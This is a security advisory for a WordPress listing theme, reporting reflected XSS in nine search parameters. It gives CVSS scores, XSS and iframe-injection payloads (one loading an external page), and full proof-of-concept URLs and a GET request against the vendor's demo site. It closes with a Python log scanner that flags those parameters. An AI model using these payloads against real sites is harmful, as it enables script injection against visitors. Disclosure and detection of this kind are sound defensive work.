CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N

The theme did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in its listing page, leading to reflected Cross-Site Scripting issues.
### -- [ Payloads: ]
[$] 13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`m0ze`);>
[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
### -- [ PoC | Unauthenticated Reflected XSS & XFS | Listing search query: ]
[!] https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E
[!] GET /main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E HTTP/1.1
Host: bello.bold-themes.com
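
A log check for the parameters this advisory lists, as an added example that is not part of the original advisory or the theme's code. It assumes a common/combined-format access log; the function names, paths and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory text above.
AFFECTED_PARAMS = {
    "listing_list_view",
    "bt_bb_listing_field_my_lat",
    "bt_bb_listing_field_my_lng",
    "bt_bb_listing_field_distance_value",
    "bt_bb_listing_field_my_lat_default",
    "bt_bb_listing_field_keyword",
    "bt_bb_listing_field_location_autocomplete",
    "bt_bb_listing_field_price_range_from",
    "bt_bb_listing_field_price_range_to",
}
# Characters that can break out of an HTML attribute or text context.
MARKUP = re.compile(r"[<>\"'`]")
# Assumption: the request line is quoted, as in common/combined log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return sorted affected parameter names whose decoded value holds markup."""
    hits = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in AFFECTED_PARAMS and MARKUP.search(value):
            hits.add(name)
    return sorted(hits)


def scan(lines):
    """Yield (line_number, [param, ...]) for log lines that need review."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2021:10:00:00 +0000] "GET /listing/?listing_list_view=standard&bt_bb_listing_field_keyword=pizza HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2021:10:00:05 +0000] "GET /listing/?bt_bb_listing_field_my_lat=13%22%3E%3Cimg%20src=x%3E&bt_bb_listing_field_category=all HTTP/1.1" 200 5310',
    '203.0.113.9 - - [01/Jan/2021:10:00:09 +0000] "GET /listing/?bt_bb_listing_field_keyword=o%27brien HTTP/1.1" 200 5200',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: review {', '.join(hits)}")
```

The third sample line shows the expected false positive: an apostrophe in a legitimate keyword search is flagged too, so hits on the keyword and autocomplete fields need manual triage.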